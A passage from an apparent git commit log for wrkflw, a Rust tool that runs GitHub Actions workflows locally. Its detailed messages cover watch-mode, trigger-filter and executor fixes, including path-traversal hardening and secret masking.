tempdir repo, starts the watcher, touches a file in a pre-existing subtree, and asserts the callback receives a `WatchEvent` with the changed file. Plus `run_returns_when_shutdown_signal_is_triggered_ before_any_event` to pin the cancellation interrupt path. Both tests run under `tokio::task::LocalSet` + `spawn_local` because `run()` is `!Send` (the executor future holds `dyn ContainerRuntime`). Document the Ctrl+C resource-leak caveat in `wrkflw watch --help` — a cycle in flight when the user interrupts will get killed by the OS without running the executor's cleanup, and users who see orphaned containers deserve to know why. All tests green (trigger-filter 84, watcher 39, ui 22, wrkflw 3); clippy clean. * fix(trigger-filter,watcher,ui,wrkflw): plug the last silent-skip holes and stop sprinkling constants Another pass over the diff-aware / watch-mode PR after review. The recurring theme is the same one the previous 24 fix-ups have been chasing: warn-and-proceed where we should fail loud, plus a pile of hardcoded constants that drifted across three call sites because nobody owned them. It turns out `--event` without `--diff`/`--changed-files`, and `pull_request` without `--base-branch`, were both still taking the log-a-warning-and-run path. In a CI script the warning is invisible and the user sees a session-long stream of "0 triggered" with no idea why. Same shape in `get_changed_files`: when `ls-files --others` failed (safe-directory config, transient permission glitch) we discarded the error in an `if let Ok(_)` block and dropped every untracked file from the changed set, silently breaking `paths:` filters for brand-new files. Not great. Ctrl+C in `watch` was the other big one. We were using `ShutdownSignal::never()` and relying on the global cleanup handler's `process::exit(0)` to tear everything down, which meant a workflow mid-execution got killed by the OS before the executor's Docker/tempdir cleanup could run. Install a real `tokio::signal::ctrl_c` handler that triggers the watcher's shutdown; the global cleanup still runs after `run()` returns, so we get a clean two-phase teardown instead of an orphaned-container parade. While at it, gather every stray constant (`GIT_COMMAND_TIMEOUT`, `GIT_STATE_CACHE_TTL`, the glob recompile cost, the hardcoded `"push"` in the TUI) into a single `TriggerFilterConfig` struct and thread it through the three call sites (CLI prefilter, watcher hot loop, TUI diff-filter). Having the same five numbers live in three different places is not my idea of configurability. The config also owns a process-wide LRU of compiled trigger configs keyed by `(path, mtime)`, so toggling the TUI filter or re-running a watch cycle no longer re-parses every YAML and recompiles every glob. The watcher picks up three other fixes in the same spirit. The git state cache now keys on `.git/HEAD`'s mtime on top of the TTL, so a `git checkout` inside the 3s window is caught on the next cycle instead of evaluating `branches:` filters against the pre-checkout branch. The debouncer grows bounded (8192 pending paths by default) and reports per-cycle drops via `WatchEvent.dropped_events` so a `cargo clean && cargo build` burst can't grow the pending set to tens of thousands of PathBufs. And the trigger-cache refresh task now preserves the previous cache on panic instead of returning `HashMap::new()` — a panicking refresh was previously forcing the next cycle to re-parse every workflow from scratch, which is the kind of performance cliff you only notice after the bug report. Parser learned an allowlist of the documented GHA events and warns (not errors — GHA adds events faster than we update lists) on any name outside it, so a typo like `pul_request` surfaces once instead of producing silent "no matching event" diagnostics forever. `--changed-files` entries now get validated up front: absolute paths, Windows drive letters, and `..` components get rejected with a clear error instead of silently failing every `paths:` glob. TUI gains a working event selector. The `diff_filter_event` field was sitting there hardcoded to `"push"` with a comment about "future UI" — which is a nice way of saying the TUI was silently lying about which pull_request/workflow_dispatch/schedule workflows would run. Shift+D now rotates through the six common events and re-runs the evaluation against the new one. The log buffer also grew a cap (5000 lines, enforced at every `mark_logs_for_update` call site) so a long-lived TUI with a lot of diff-filter toggling doesn't slowly leak memory. New tests cover every new behavior: LRU hit + mtime invalidation, `normalize_user_changed_file` rejecting the bad shapes, the unknown event warning, the debouncer cap counting drops without counting deduped paths, HEAD-mtime cache invalidation, and the TUI log cap. Full workspace still green, clippy silent, fmt clean. Please don't add more file-local constants to this pipeline. Put them in `TriggerFilterConfig`. * fix(trigger-filter,watcher): plug parser, git, and worktree silent-skip holes Another round of review fallout. Six things were wrong, bundled because they all share the same failure mode: silently producing "0 triggered" for the wrong reason and sending users chasing a flag they never needed. `on: {}` and `on: []` were accepted at parse time and then surfaced as "Workflow does not listen to any events" from the evaluator — with no workflow path, no YAML context, nothing. GHA rejects both at upload time. Reject them here too, at parse, where the error actually carries the file path and the user has something to grep for. `git diff --name-only` and `git ls-files --others` were newline-terminated. So a file called `foo\nbar.txt` got reported as two bogus half-entries, and any non-ASCII filename came back as `\302\244`-style octal escapes that no `paths:` glob could ever match. The fix is three characters: `-z`. Rip out the old `parse_lines` helper and route everything through a new `parse_nul_separated` that splits on NUL and tolerates the trailing NUL git sometimes emits. Pinned with a real-git-repo end-to-end test that commits a file whose name contains a literal newline and asserts it survives the round trip. `head_mtime` stat'd `.git/HEAD` directly, which returns None on every linked worktree because in that layout `.git` is a regular file containing `gitdir: /abs/path/to/real/gitdir`. The watcher's git-state cache then served stale `(branch, tag)` pairs until the bare TTL expired. Parse the pointer, resolve relative paths the same way git does (against the `.git` file's parent), and stat the real HEAD. Plain repos are unchanged. The `buffer_unordered` block in watcher.rs had a comment claiming "Each future wraps a `tokio::spawn`". It doesn't. That's actively load-bearing — spawning would detach the futures from the stream and let max_concurrent_executions be silently ignored. Rewrite the comment to say what the code actually does and why, so the next refactor doesn't "fix" it into an unbounded fork bomb. Please don't do that. The path-filter diagnostic told users to "pass --diff or --changed-files" even when they had already passed `--diff` and it had just come back empty. Confusion ensues. Add `EventContext::changed_files_explicit`, set it to `true` in every constructor that actually ran a diff (the three lib.rs helpers and the watcher's in-tree path), and split the diagnostic into two cases so "no diff run yet" and "diff was empty" read differently. While at it, mark `EventFilter`, `WorkflowTriggerConfig`, and `TriggerMatchResult` `#[non_exhaustive]`. No external crate constructs them today — they only read — so this costs nothing now and buys room to add fields without a major bump later. `EventContext` stays exhaustive because the watcher builds it via struct literal and I'm not rewriting that. Every fix has a pinned test. `cargo test --workspace` is 629/629. `cargo clippy --all-targets` clean. `cargo fmt` clean. * fix(trigger-filter,watcher,ui,wrkflw): kill dead plumbing and unlock the pattern cache Staff-level review of the diff-aware watch branch came back with a pile of findings. Most were easy, but three of them were actually embarrassing and needed to go before anyone else looked at this. First, `PATTERN_CACHE` was holding its mutex across the blocking YAML parse + glob compile in `load_trigger_config`. The whole point of a process-wide LRU is that concurrent callers hitting different files don't pay for each other's parses — and we were doing the exact opposite. One slow network-mounted workflow file would stall every other caller in the process until it finished. Release the lock on a miss, parse, re-acquire to insert. Racing duplicate parses on the same file are harmless because late-writer-wins produces the same value. Second, `TriggerFilterConfig` shipped two config knobs — `git_timeout` and `strict_missing_context` — that had builder setters, had unit tests pinning the builder setters, and were read by absolutely nothing in the library. The timeout lived as a file-local const in `git.rs` and strict-mode was implemented entirely in the CLI. Shipping non-functional config knobs is precisely the kind of drift this crate has been iteratively patching, so I deleted them rather than half-wiring them. If anyone ever needs the git timeout override, thread `Duration` through `run_git` first and add the field at the same commit. Third, `KNOWN_GHA_EVENTS` contained `pull_request_comment`, which is not a real GitHub Actions event. Comments on PRs arrive as `issue_comment` (PRs are issues). Leaving this in the typo- detection allowlist silently masked the exact warning the function exists to produce. One-word fix, regression test pinned. While at it, I cleaned up the other findings: - Library logging coupling: `collect_unknown_event_warnings` (renamed from `warn_on_unknown_events`) and `get_changed_files_with_warnings` no longer dual-emit via `wrkflw_logging::warning` AND the return value. They collect warnings as data; hosts own the rendering policy. Warnings now ride through a new `WorkflowTriggerConfig::warnings` field in addition to `EventContext::warnings`. The CLI prefilter renders both. The one remaining library log call is the verbose-gated `info!` in `get_default_diff_base` — opt-in, informational, not dual-emission, and fixing it requires signature cascades I didn't want in this commit. - `Debouncer::MAX_SETTLE_ROUNDS` was hardcoded to 3. That was tuned for the default 500ms debounce (3 × 500 = 1.5s worst case) but a user passing `--debounce 5000` would see a 15s worst-case drain delay under sustained churn. Replaced with a wall-clock `MAX_SETTLE_BUDGET = 1500ms` and a dynamic round cap derived from the debounce window. Preserves the old behavior at 500ms and caps long windows correctly. - `head_mtime` was reachable only via `git::head_mtime`, with the watcher reaching into a sibling crate's `pub` module. Re-export at the crate root so the coupling is explicit. - `normalize_user_changed_file` didn't reject embedded NUL bytes. NUL is not a valid pathname byte on any supported platform, and letting one through would only produce downstream confusion. Reject at the boundary with the rest of the input validation. - `wrkflw watch` had no CLI flag for `extra_ignore_dirs`. The watcher supported the knob but users couldn't pass extras without patching source. Added `--ignore-dir`, comma-separated or repeated. - `apply_activity_type` was a one-line function called from one site. Inlined it. - `cycle_diff_filter_event` re-ran the evaluation by calling `toggle_diff_filter` twice in sequence — correct but cryptic. Extracted `rerun_diff_filter_if_active` so the idiom is named for what it does. All 332 tests in the workspace still pass, plus the new regression pins. Clippy clean, fmt clean. * fix(ui,watcher): plug TUI warning drop + kill double-toggle fragility Another review pass. The TUI diff filter was silently dropping every `EventContext::warnings` and every `WorkflowTriggerConfig::warnings` on the floor — exactly the silent-skip failure mode this entire PR has been fighting for 28 commits. The library deliberately routes those diagnostics through struct fields instead of logging them directly, because hosts own the rendering policy. The CLI prefilter at crates/wrkflw/src/main.rs does the right thing. The TUI just didn't. It turns out that 'hosts own the rendering policy' is a contract the compiler can't enforce. A git ls-files --others safe-directory rejection, an 'on: pul_request' typo, a corrupted index — none of it reached the log pane. User saw '0/N would trigger' with no clue why. Let's fix that. DiffFilterReport grows a warnings: Vec<String> field. evaluate_diff_filter now drains context.warnings via mem::take and harvests each parsed config's .warnings with the workflow path prefixed, then check_diff_filter_results renders them under a 'Diff filter: N warning(s)' line, mirroring the CLI prefilter byte-for-byte. New regression test pins it. While at it, rerun_diff_filter_if_active was implemented as two consecutive toggle_diff_filter() calls. Clever. Also fragile: the whole thing worked only as long as toggle_diff_filter stayed purely idempotent in opposing directions, and a future side effect (metrics, tracing, throttle) would have silently broken the rerun path with zero compile-time signal. Extract spawn_evaluation() and abort_in_flight_evaluation() as named helpers so the control flow matches the intent. The existing abort-flag regression tests still pin the tricky state-machine invariants through the refactor. And the Debouncer::MAX_SETTLE_BUDGET doc claimed a hard 1.5s cap on drain latency that the code doesn't actually enforce when the user passes a debounce window longer than the budget — a single tokio::time::sleep is not preemptible and the inner sleep runs the full user-supplied duration. This is not great, but the alternative (chopping up the inner sleep) would starve the legitimate coalescing cases. Soften the doc to describe the real worst case instead of lying about a cap. The pinning tests already cover both short- and long-window paths. Minor: help overlay documents 'd' (toggle diff filter) but not Shift+D (cycle event). Add the missing line. * fix(trigger-filter,watcher,wrkflw,ui): plug review holes and enforce warning drain A code review turned up three real correctness bugs and a handful of latent traps. Rather than patch them piecemeal, fix the whole batch in one go so the contract that ties them together — "never silently drop a diagnostic" — is actually load-bearing in the type system and not just a convention nobody remembers to follow. The three correctness bugs first: 1. `cached_git_state` was capturing `head_mtime` after the two git reads. The doc comment claimed this was fine because "a checkout between the read and the store will show up as an mtime mismatch on the very next call" — it turns out the comment was wrong. If a checkout lands between the branch/tag reads, we store the post-checkout mtime alongside the pre-checkout branch, and the very next lookup's stat matches the stored value and happily serves the stale branch until the TTL expires. Move the mtime capture before the git reads so a race produces a visible mismatch. Regression test interleaves a real `git checkout` between cache calls. 2. `collect_workflow_files_blocking` was returning `Err(NoWorkflows)` for an empty directory. Watch mode's entire value proposition is "react to files that don't exist yet", so refusing to start on an empty `.github/workflows` is actively wrong. Worse: mid-session, if the user deleted every workflow file, the rescan failed, the watch loop fell back to the stale snapshot, and `refresh_trigger_cache_blocking` retained the deleted entries in the compiled-pattern cache. So the evaluator kept running against workflows that no longer existed. Let's fix that. Empty dir is now `Ok(vec![])`, the watcher logs an info line and carries on, and the `retain` step correctly evicts stale entries. 3. The pattern cache was keyed on mtime alone. On FAT32 and some SMB/NFS configs, two edits within the mtime resolution window (1-2 seconds) collide, and the second parse gets served a stale compiled config. Combine `(mtime, len)` as the key — size changes catch the overwhelming majority of iterative edits, and it's free because we were already reading the metadata. A content hash would close the remaining gap but would require a full file read on every lookup, which is precisely what the cache exists to avoid. The bigger structural change is the warning-drain contract. The trigger-filter crate routes non-fatal diagnostics (unknown event names, `git ls-files --others` failures) through struct fields instead of calling `wrkflw_logging::warning` directly, so hosts own the rendering policy. That's the right design. But it was enforced entirely by convention, and convention is not a type system. Proof: `refresh_trigger_cache_blocking` in the watcher was silently dropping `WorkflowTriggerConfig::warnings` on the floor. Nobody noticed because the field was a plain `Vec<String>` and forgetting to iterate it had no consequences. Exactly the silent-skip mode the rest of this PR exists to prevent. Let's fix that too. New `MustDrainWarnings` newtype with a `debug_assertions`-gated `Drop` impl that `eprintln!`s when a non-empty buffer is dropped without being observed via `take()`. Release builds carry zero overhead. Tests and CI catch the regression immediately. `EventContext::warnings` and `WorkflowTriggerConfig::warnings` now use it, every host drains explicitly (`take()`, not read-only iteration), and the watcher site that was dropping warnings on the floor now routes them through `wrkflw_logging::warning` at insert time. One subtlety: the library's LRU cache stashes a clone of the parsed config alongside the original it returns to the caller. The clone's warnings would otherwise trip the Drop check on eviction. Drain them at insert time — the returned original still carries the full set for the first observer, and subsequent cache-hit callers see empty warnings, which is the correct UX (a first-parse diagnostic should not be re-logged on every cache hit). While at it, a few opportunistic cleanups the review flagged: - `run_trigger_prefilter` returns `Result<PrefilterDecision, String>` instead of calling `std::process::exit` from half a dozen sites deep inside the body. The flag matrix is now unit-testable without spawning a subprocess; three new tests pin the "directory path", "missing path", and "non-matching skip" branches. - The `--strict-filter` / `--no-strict-filter` coalescing was duplicated across the `run` and `watch` handlers. Extract `effective_strict_filter(strict, no_strict)` so a third host can't pick up a slightly different version of the same bool-toggle pattern. - `normalize_user_changed_file` was accepting whitespace-only and empty path components (`src/ /foo.rs`, `src//foo.rs`, trailing slash). These silently fail every `paths:` glob at evaluation time — exactly the kind of input the function exists to reject up front. Reject them with a clear "your flag was wrong" message. 640+ tests passing across the workspace, clippy clean with `-D warnings`. Nine new tests cover the fixes, each with a comment naming the prior failure mode so a future refactor can't silently regress them. * fix(trigger-filter,watcher,wrkflw): plug the last six review holes Review pass flagged eight items. Six code fixes, two coverage gaps — close all of them so the branch can land without carrying documented regressions. The biggest one: the `PATTERN_CACHE` docstring promised that the CLI, the TUI, and the watcher all shared one parse per (path, mtime) across the process. It turns out they didn't. Each host handed `load_trigger_config_cached` a different `PathBuf` shape — raw user input vs relative `read_dir` output vs canonicalized notify paths — so each host effectively maintained its own de-facto private cache entry. The cross-host sharing was pure aspiration. Fix is to canonicalize inside the cache lookup via `canonicalize_allowing_missing` (promoted out of the watcher crate since three consumers need it now) and rewrite `workflow_path` back to the caller's original form on return so UI labels still show what the user typed. Two more loop-discipline oversights in the watcher. `debouncer.drain().await` sat outside any `tokio::select!` against the shutdown signal, so Ctrl+C during an active drain had to wait up to the full debounce window before the loop observed it. Every other await in `run()` is cancellation-aware — this one was the last outlier. And the per-cycle callback supervisor was a detached `tokio::spawn`: correct on the happy path, but a stuck reporter accumulates one task per cycle forever because the runtime's own reaper is the only thing polling the handle. Now held in a `JoinSet`, reaped via `try_join_next` at the top of each iteration, with a one-shot warning when the backlog crosses eight. The rest is smaller. `--max-pending-events` no longer advertises a misleading `default: 0` in `--help`; the flag is `Option<usize>` and `Some(0)` is explicitly rejected since a zero cap would drop every event. The parser gets a doc note explaining why the duplicate-event-key concern the reviewer raised is not reachable on `serde_yaml >= 0.9.4` — `parse_workflow` errors upstream before ever hitting `parse_events`. Don't remove it; add the HashSet-walk defence only if someone swaps in a permissive YAML loader. Two new tests pin the `PATTERN_CACHE` concurrency contract and the `--diff-head` without `--diff-base` branch in `build_event_context`. Both were docstring claims that nothing actually exercised, which is how these things rot in the first place. Version bump to 0.8.0 and the README breaking-change section are deferred to a follow-up PR so the release ceremony isn't entangled with the code review. * fix(trigger-filter,watcher,wrkflw): plug four more review holes Four things the previous round missed, in order of how much they would have hurt in production. The callback supervisor JoinSet in the watcher had a warning threshold but no hard cap. That's cute when the reporter is momentarily slow, but a truly wedged reporter (deadlocked file sink, stuck network webhook) just accumulates one supervisor per cycle forever — the warning never reclaims anything, and memory grows for the life of the session. Add `SUPERVISOR_HARD_CAP = 128` and drop the current cycle's `WatchEvent` when we hit it. Loud error, one-shot latch with hysteresis on the reclaim path, the watch loop keeps running. Not pretty, but the alternative is eventually having the OOM killer express an opinion. `parse_nul_separated` was calling `from_utf8_lossy` on every record, which silently replaced invalid UTF-8 bytes with U+FFFD and left the file in the change set under a name that could not match any real glob. This is the exact "silently lying about which workflows would run" failure mode the rest of the crate has been fighting, and it was hiding right inside the NUL parser. Collect the lossy names in a separate list and surface them via `EventContext::warnings` so the user at least sees which file was dropped from the filter's view. Strict-filter default-on (`wrkflw run --event push` now exits 1 without `--diff`/`--changed-files`) is a visible CLI behavior change and the commit message was the only place it was documented. That's not great. Add a BREAKING_CHANGES.md entry with migration examples for each escape hatch, exit-code semantics, and a pointer at `--no-strict-filter` for scripts that cannot move yet. While at it, flesh out the `LOG_BUFFER_CAP = 5000` comment in the TUI (why not 1000, why not 20000, what the two dominant log sources are), extract the supervisor constants to module level so they can be reasoned about, and add tests the review flagged as missing: a compile-time invariant on the supervisor cap ordering, a runtime test that shutdown still unblocks `run()` when the reporter callback is wedged (release-gated blocking thread so cargo can reap it), and three prefilter tests pinning the strict-mode rejection paths for `--event`-alone and `pull_request`-without-`--base-branch`.	2026-04-11 20:27:34 +05:30
Gokul	faf1af6ff5	fix(validators): reject non-mapping env values in validate (#90 ) It turns out that `wrkflw validate` was happily accepting `env: VAR=value` — a bare string — when GitHub Actions only allows mappings for env. The reason is that the validate path (evaluate_workflow_file) runs its own structural validators but never actually checks the type of env fields. The JSON schema gets it right, but it's only wired up in the parser path, not the validator. Add a validate_env() helper that checks env is either a YAML mapping or an expression string (${{ }}), and wire it into all three levels: top-level, job-level, and step-level. Tests included for each. Closes #89	2026-04-06 22:17:18 +05:30
Gokul	36c1aa16f3	feat(executor): add artifact, cache, secrets, and inter-job output support for GitHub Actions emulation (#88 ) * feat(executor): close major GHA expression and inter-job gaps The expression evaluator was basically living in a fantasy world where every step succeeds, secrets don't exist in expressions, and jobs can't talk to each other. That's not how GitHub Actions works, and it meant a lot of real-world workflows would silently produce wrong results or just fail to resolve context variables. Here's what was broken and what's fixed: Step outcome/conclusion were hardcoded to "success" — always. So `if: steps.build.outcome == 'failure'` would never be true, and `continue-on-error` semantics were completely wrong. ExpressionContext now tracks real outcome (before continue-on-error) and conclusion (after). The success()/failure()/cancelled() builtins now consult actual job state instead of returning constants. secrets.* was not available in expressions at all. You could use SecretSubstitution for env var injection, but `if: secrets.TOKEN` in a conditional? Nope, just resolves to null. Pre-resolve all referenced secrets into a HashMap at job start and thread it through the expression context. Evaluator stays synchronous. needs.* context didn't exist. Job outputs were computed and then thrown away — nothing flowed between job batches. Add outputs field to JobResult, resolve job-level output mappings from step outputs, accumulate across batches in the main execution loop, filter to declared needs dependencies, and wire into ExpressionContext. jobs.* context gets the same treatment for free. While at it, add three new modules that were completely missing: - artifacts.rs: Local ArtifactStore for actions/upload-artifact and actions/download-artifact emulation. Filesystem-based, Arc<RwLock> for cross-job sharing. - cache.rs: Persistent CacheStore under ~/.wrkflw/cache/ for actions/cache emulation. SHA-256 keyed with prefix matching for restore-keys. - workflow_commands.rs: Parser for ::error::, ::warning::, ::set-output::, ::add-mask::, ::group:: and friends from step stdout. Handles stop-commands/resume semantics. 414 tests pass, 0 failures, clippy clean. * fix(executor): fix matrix job context gaps and parameter explosion The previous commit added expression context enrichment (secrets, needs, step outcomes) but only wired it into the non-matrix execution path. Matrix jobs — arguably the most common GHA pattern — were silently getting empty contexts for everything. So secrets.* in a matrix job? Null. needs.* from an upstream job? Null. steps.X.outcome after a failure? "success". Brilliant. It gets worse. Job outputs were keyed by job_result.name, which for matrix jobs is the display name ("build (os: ubuntu)") rather than the canonical job key ("build"). Since build_needs_context looks up by the canonical name from job.needs, matrix job outputs were being accumulated and then never found by downstream jobs. While at it, unknown step IDs were defaulting to "success" instead of null, which means `steps.nonexistent.outcome == 'success'` was true. That's not how GitHub Actions works. Here's what's fixed: - Thread secrets, needs context, and step status tracking through MatrixExecutionContext into execute_matrix_job. Pre-resolve secrets once before the parallel fan-out, not per-combination. - Add canonical_name field to JobResult and key the accumulation maps by it. Matrix combinations use last-write-wins, matching GHA. - Track step_status_map and job_status_str in the matrix step loop, mirroring what execute_job already does. - Resolve job outputs in execute_matrix_job instead of returning an empty HashMap. - Thread secrets into execute_composite_action (GHA composites inherit the calling workflow's secrets). - Fix unknown step ID fallback from "success" to Null. - Refactor preprocess_expressions (10 params → 3) and evaluate_condition_with_context (9 params → 2) to accept ExpressionContext directly. Every new context dimension was requiring changes to 30+ call sites. Not anymore. 274 tests pass, clippy clean. * fix(executor): address review findings from GHA emulation PR The previous two commits closed a bunch of GHA expression gaps, but the review turned up several things that shouldn't ship as-is. The worst offender: execute_composite_action was passing step_statuses: &HashMap::new() and job_status: "success" as constants into every step execution. So steps.X.outcome inside a composite action? Always Null. success()/failure()? Always true/false. Composite actions with conditional steps based on prior step results were quietly broken. Fix that by tracking composite_step_statuses and composite_job_status within the composite loop, same pattern as execute_job and execute_matrix_job. While at it: - Extract record_step_status() to deduplicate ~15 identical lines of StepStatus-to-string conversion + map insertion that were copy-pasted between execute_job and execute_matrix_job. Those were one edit away from diverging. - Derive Copy on StepStatus (it's a fieldless enum — cloning it was just noise) and add Display so we stop writing the same match arm in three places. - Pass actual job_status_str into resolve_job_outputs instead of hardcoding "success". If a job output expression references success()/failure(), it should get the real answer. - Change CacheStore::new() from Option<Self> to Result<Self, String> so callers can actually tell why cache init failed instead of getting a silent None. - Downgrade artifacts and cache modules from pub to pub(crate) — they're not wired into the engine yet, so exposing them as public API is just asking for someone to depend on an unstable interface. - Replace Box::leak in expression.rs tests with lazy_static constants. The leaks were harmless in practice but fragile if anyone ever puts empty_ctx() in a loop. 274 tests pass, clippy clean. * feat(executor): wire up artifact, cache, and workflow command modules Three modules — artifacts.rs, cache.rs, workflow_commands.rs — were sitting in the crate fully implemented, fully tested, and fully unused. 751 lines of dead code that the compiler was rightly complaining about. Let's fix that. ArtifactStore now gets created per workflow run and threaded through the entire execution context chain (execute_job_batch → job_with_matrix → matrix_job → StepExecutionContext). actions/upload-artifact and actions/download-artifact are emulated inline in execute_step(), following the same pattern as actions/checkout. CacheStore is stateless (filesystem-backed at ~/.wrkflw/cache/), so it gets created on-demand — no threading needed. actions/cache does restore-or-save in one shot and writes cache-hit to GITHUB_OUTPUT. Not the full dual-phase model GHA uses, but good enough for local emulation. Workflow commands (::set-output::, ::error::, ::warning::, etc.) are now parsed from step stdout via process_workflow_commands() in all three step loops (execute_job, execute_matrix_job, composite action). The deprecated ::set-output:: feeds into step_outputs_map before GITHUB_OUTPUT file processing, so the modern mechanism takes precedence. ::add-mask:: is logged but not wired to SecretMasker yet because that requires Arc<Mutex<>> wrapping — deferred to a follow-up. While at it, added preprocess_with_value() so action with: params get ${{ }} expression resolution before being used by the emulation branches. * fix(executor): fix review findings — cache lifecycle, secret duplication, path traversal The PR review flagged several real issues. Let's go through them. CacheStore was being created per step inside execute_step, while ArtifactStore was sensibly created once per workflow run. This meant parallel matrix jobs would race on the same ~/.wrkflw/cache/ directory with zero coordination. Promote CacheStore to per-run lifecycle matching ArtifactStore, threading it through JobExecutionContext → MatrixExecutionContext → StepExecutionContext. resolve_secrets_for_context was called once in execute_job_with_matrix (for the matrix path) and then again inside execute_job (for the non-matrix path), completely wasting the first resolution. Move the call before the matrix/non-matrix branch and thread the result via a new secrets_context field on JobExecutionContext. ExpressionContext was constructed verbatim ~10 times across engine.rs — 8 fields, every single time. Every new field meant updating all 10 sites. Add expr_context() and expr_context_with_env() methods to StepExecutionContext so this boilerplate collapses to one-line calls. While at it, add path traversal and symlink protections: walk_files (artifacts) and copy_dir_contents (cache) now skip symlinks; artifact upload validates glob results are within the workspace via canonicalization; cache save/restore validates paths don't escape the workspace. * fix(executor): fix review findings — output context, reusable stores, path validation It turns out that resolve_job_outputs was constructing its ExpressionContext with an empty step_statuses map, so any job output expression referencing steps.<id>.conclusion would silently resolve to Null. Not great when you're trying to emulate GHA faithfully. While at it, the reusable workflow paths were each creating their own ArtifactStore rooted at Path::new(".") instead of reusing the parent workflow's stores. This meant artifacts uploaded in a parent job were invisible to the reusable workflow, and vice versa. Same story for inter-job needs context — reusable workflows were passing empty HashMaps, so multi-job called workflows with `needs:` deps would get nothing. Let's fix that. The matrix output overwrite was a known GHA semantic edge case, but we were silently clobbering previous combinations' outputs. Now we at least warn about it so nobody spends an afternoon debugging why needs.build.outputs only has values from the last matrix combo. Also replaced the naive `path.contains("..")` check in cache path validation with proper Path::components() inspection, because a directory literally named "..bar" is not a traversal attack. * fix(executor): close review findings — path traversal, JobStatus duplication, stale plan.md The download-artifact emulation was joining user-provided `path` input directly via ctx.working_dir.join() without ever checking that the result stays inside the workspace. A crafted `with.path` containing `../` could write artifact files anywhere on disk. Add canonicalize + starts_with validation matching the pattern already used in cache.rs. This was the only action emulation path missing the check — upload-artifact and cache both had it. While at it, add a Display impl for JobStatus to kill the three identical match blocks converting status to "success"/"failure"/ "skipped" strings. StepStatus already had this — JobStatus just got forgotten. Also remove plan.md (development scratch file that snuck into the branch), add TODO comments for reusable workflow secret propagation, and clarify why GitLab pipelines pass empty needs context maps. * fix(executor): close review findings — masker wiring, loop dedup, cache eviction The code review flagged six issues ranging from "this will leak secrets" to "this will eat your disk." Let's go through them. The ::add-mask:: workflow command was being parsed and then thrown away. The SecretMasker took &mut self for add_secret(), making it impossible to call through the shared &SecretMasker references threaded through step execution. Fix this by switching SecretMasker to interior mutability (RwLock) so add_secret() takes &self. Now process_workflow_commands() actually wires AddMask values into the masker. Secrets no longer appear in plain text in output logs. The step-execution loops in execute_job and execute_matrix_job were copy-pasted with minor formatting differences — the kind of thing that drifts apart over time until someone spends a week debugging why matrix jobs don't process workflow commands the same way as regular jobs. Extract a StepLoopState struct with a process_outcome method that handles status recording, logging, command parsing, and env file application in one place. The cache at ~/.wrkflw/cache/ had no eviction and no size limit, which is the kind of optimism I find alarming in something that writes to the user's home directory. Add a 1 GiB cap with LRU eviction by mtime, triggered automatically after each save. While at it: fix cache.rs file_name().unwrap_or_default() to return a proper error instead of writing to an empty filename, fix artifacts.rs strip_prefix fallback to error instead of silently using absolute paths, and aggregate reusable workflow outputs into the parent JobResult instead of always returning an empty map. 14 new tests covering all the above. 292 tests pass, zero failures. * fix(executor): harden artifact store, masker locks, and cache prefix matching It turns out that ArtifactStore was happily accepting names like "../../escape" and joining them directly onto the artifact root path. That's a path traversal bug. The artifact name comes from user workflow `with.name`, so any workflow could write outside the artifact directory. Let's not do that. Added sanitize_artifact_name() that rejects names containing path separators, "..", null bytes, or leading dots. Both upload() and download() now validate before touching the filesystem. While at it, the upload/download methods were async functions that did nothing but blocking std::fs calls — which blocks the tokio runtime thread. Wrapped the file I/O in spawn_blocking so we stop lying about being async. SecretMasker's RwLock calls all used .unwrap(), which means a single panic while holding a write guard poisons the lock and cascades into panics on every subsequent access. Replaced with .unwrap_or_else(\|e\| e.into_inner()) so we recover from poisoned locks instead of bringing down the whole workflow execution. CacheStore::find_by_prefix was returning whichever entry read_dir happened to yield first — completely non-deterministic. Now scans all entries and picks the one with the newest mtime, which matches GitHub Actions' behavior of preferring the most recently created matching key. Also removed an unnecessary clone in StepLoopState::process_outcome (Skipped arm was using ref + clone when it could just move), and fixed pre-existing clippy warnings in the secrets crate tests. * fix(executor): wrap CacheStore I/O in spawn_blocking, add missing tests CacheStore was doing all its filesystem I/O — recursive directory copies, eviction scans, the whole shebang — directly on the async executor thread. ArtifactStore already knew better and used spawn_blocking. CacheStore just... didn't. Let's fix that. Make CacheStore Clone and move restore/save into async wrappers that offload the real work to spawn_blocking. The internal logic is unchanged, just properly sequestered where it won't block the Tokio runtime. While at it, document the cache save-on-miss divergence from real GitHub Actions (we save eagerly; GHA uses a post-step hook), add a proper doc comment explaining the RwLock poison recovery strategy in SecretMasker, and add unit tests for build_needs_context and resolve_job_outputs that were previously untested. * fix(executor): close silent failure modes found in PR review Four things came out of the review that were all variations of the same theme: "something goes wrong and nobody hears about it." The cache restore task was swallowing panics via `.ok()?`, which is a lovely way to make debugging impossible. Match the error handling pattern already used in save() — log the panic, return None. The GITHUB_OUTPUT write for cache-hit was using `let _ =` to discard I/O errors. This was the only silent error discard in the entire module, which makes it feel less like a deliberate choice and more like an oversight. Log the failure instead. `secrets: inherit` on reusable workflows was silently ignored because the code only handled the mapping case and inherit comes through as a bare string. Emit an explicit warning so users know their secrets aren't actually being inherited yet. While at it, replace `&line[2..]` with `strip_prefix("::")` in the workflow command parser. The starts_with check above guarantees safety, but direct byte indexing is fragile and strip_prefix says what it means. * fix(executor): fix atomicity, eager save, and untested eviction Three bugs found during PR review, all quietly waiting to bite someone: 1. SecretMasker::add_secret() was doing two separate RwLock acquisitions — one for secret_cache, one for secrets. A concurrent mask() call between the two writes sees inconsistent state. The fix is embarrassingly simple: put both collections behind a single RwLock<SecretData>. One lock, one write, no window. 2. The actions/cache emulation was saving eagerly on cache miss, right there in the step. Real GitHub Actions saves in a post-step hook that only runs after all steps complete and only if the job succeeded. Our eager save could persist stale or incomplete data into ~/.wrkflw/cache/ and poison future runs. Defer saves into a Mutex<Vec<PendingCacheSave>> on the step context, flush at end-of-job conditional on success. 3. The eviction test was, shall we say, aspirational. It created two tiny entries well under the 1 GiB limit, then asserted both still existed. That's not testing eviction, that's testing storage. Make max_size configurable on CacheStore, set it to 30 bytes in the test, and actually verify the oldest entry gets evicted. * fix(executor): close reusable workflow secrets gap, wire matrix env substitution The reusable workflow path was passing `None, None` for secret_manager and secret_masker into child execute_job_batch calls. This meant that `${{ secrets.* }}` expressions inside called workflows resolved to null even when the parent had explicitly passed secrets via the `secrets:` mapping. That's... not great. Pass the parent's secret_manager and secret_masker through so secrets actually work in reusable workflows. While at it, the matrix job path had a lingering TODO where job-level env values like `MY_VAR: ${{ matrix.os }}` were inserted raw without expression substitution. Wire up preprocess_expressions with the matrix combination context so these actually resolve. Collect resolved values before insertion to dodge the 